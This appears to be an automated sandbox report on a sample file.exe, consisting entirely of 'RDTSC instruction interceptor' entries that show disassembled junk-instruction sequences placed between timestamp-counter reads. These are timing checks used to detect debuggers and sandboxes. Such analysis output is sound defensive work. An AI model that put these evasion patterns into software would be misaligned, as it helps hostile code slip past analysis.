Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4298AA second address: 4298B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4298B2 second address: 4298B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4298B7 second address: 4298D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F856106A863h 0x00000008 jmp 00007F856106A85Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4326D8 second address: 4326DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 431B94 second address: 431BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F856106A860h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 431E7F second address: 431E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323B6 second address: 4323C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F856106A856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323C0 second address: 4323D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856102FBEEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323D4 second address: 4323DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4323DA second address: 43242A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF0h 0x00000007 jc 00007F856102FBE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F856102FBF0h 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F856102FBEDh 0x00000020 popad 0x00000021 jmp 00007F856102FBF1h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43242A second address: 432438 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F856106A858h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43AB9D second address: 43ABA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43AE92 second address: 43AEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jne 00007F856106A856h 0x00000010 pop edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43AEA6 second address: 43AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F856102FBE6h 0x0000000a jnl 00007F856102FBE6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B022 second address: 43B026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B026 second address: 43B02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B02F second address: 43B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B4BE second address: 43B4F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F856102FBE6h 0x00000009 pop edi 0x0000000a push esi 0x0000000b jmp 00007F856102FBF9h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jno 00007F856102FBE8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B4F4 second address: 43B4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B651 second address: 43B675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF0h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F856102FBEEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B675 second address: 43B68F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A865h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B815 second address: 43B81F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F856102FBE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B958 second address: 43B968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A85Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43B968 second address: 43B991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F856102FBE6h 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop edx 0x00000010 push ebx 0x00000011 jmp 00007F856102FBF0h 0x00000016 jp 00007F856102FBECh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43C81A second address: 43C82F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43C82F second address: 43C862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856102FBF8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F856102FBF1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 43A516 second address: 43A526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F856106A856h 0x0000000a jng 00007F856106A856h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4431C0 second address: 4431D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jmp 00007F856102FBF1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 443331 second address: 443352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F856106A866h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4505A2 second address: 4505AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F856102FBE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4505AE second address: 4505B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4628C4 second address: 4628CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4628CF second address: 4628D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4628D5 second address: 4628E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A1C second address: 371A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A22 second address: 371A3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F856102FBE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F856102FBEBh 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A3E second address: 371A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 je 00007F856106A874h 0x0000000c jno 00007F856106A85Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 371A5B second address: 371A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46B35D second address: 46B372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F856106A85Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469C5C second address: 469C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469F84 second address: 469F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469F8A second address: 469F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469F8E second address: 469FA4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F856106A86Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 469FA4 second address: 469FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46A689 second address: 46A693 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46A693 second address: 46A6BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F856102FBE6h 0x00000009 jnc 00007F856102FBE6h 0x0000000f pop esi 0x00000010 push esi 0x00000011 jng 00007F856102FBE6h 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jp 00007F856102FC06h 0x00000022 jnl 00007F856102FBECh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46B0E6 second address: 46B0EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46C9D9 second address: 46C9F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 46C9F8 second address: 46C9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 480979 second address: 480986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 480986 second address: 48098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48098A second address: 480993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4807F9 second address: 48081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F856106A861h 0x0000000d jl 00007F856106A85Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 483FA6 second address: 484011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F856102FBE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jnl 00007F856102FBF4h 0x00000015 jmp 00007F856102FBF0h 0x0000001a pushad 0x0000001b jmp 00007F856102FBF7h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F856102FBF9h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 492997 second address: 49299B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49299B second address: 49299F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49299F second address: 4929DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F856106A870h 0x0000000c jmp 00007F856106A85Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 492584 second address: 49258A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49258A second address: 49258E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49258E second address: 492594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 492594 second address: 4925AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F856106A856h 0x0000000d push eax 0x0000000e pop eax 0x0000000f je 00007F856106A856h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB17F second address: 4AB186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB186 second address: 4AB18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB18C second address: 4AB192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB192 second address: 4AB196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB47D second address: 4AB483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB483 second address: 4AB487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB487 second address: 4AB4AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF6h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F856102FBE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB4AD second address: 4AB4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB4B1 second address: 4AB4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AB737 second address: 4AB73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4ABE14 second address: 4ABE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AEE33 second address: 4AEE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AEE39 second address: 4AEE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F856102FBECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AEE4A second address: 4AEE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AF17E second address: 4AF182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AF182 second address: 4AF191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AF191 second address: 4AF197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1F05 second address: 4B1F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1F0B second address: 4B1F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1F0F second address: 4B1F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F856106A856h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1AA5 second address: 4B1AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B1AAB second address: 4B1ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F856106A866h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B39C3 second address: 4B39C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C0306 second address: 3C030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C030D second address: 3C0313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0400 second address: 50B042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F856106A869h 0x0000000a jmp 00007F856106A85Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B042B second address: 50B0467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F856102FBF8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0467 second address: 50B046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B046B second address: 50B0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0471 second address: 50B0477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B0477 second address: 50B047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E04B6 second address: 50E0554 instructions: 0x00000000 rdtsc 0x00000002 call 00007F856106A85Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F856106A864h 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F856106A860h 0x00000019 mov ebp, esp 0x0000001b jmp 00007F856106A860h 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 mov di, si 0x00000025 mov ax, E009h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F856106A85Fh 0x00000030 xchg eax, ecx 0x00000031 jmp 00007F856106A866h 0x00000036 xchg eax, esi 0x00000037 jmp 00007F856106A860h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F856106A85Eh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0554 second address: 50E05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007F856102FBEAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f jmp 00007F856102FBF0h 0x00000014 lea eax, dword ptr [ebp-04h] 0x00000017 jmp 00007F856102FBF0h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F856102FBF7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E05A5 second address: 50E05E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F856106A85Ah 0x00000013 xor ecx, 6A670538h 0x00000019 jmp 00007F856106A85Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E05E4 second address: 50E060B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F856102FBEAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E060B second address: 50E061A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E061A second address: 50E0632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856102FBF4h 0x00000009 rdtsc
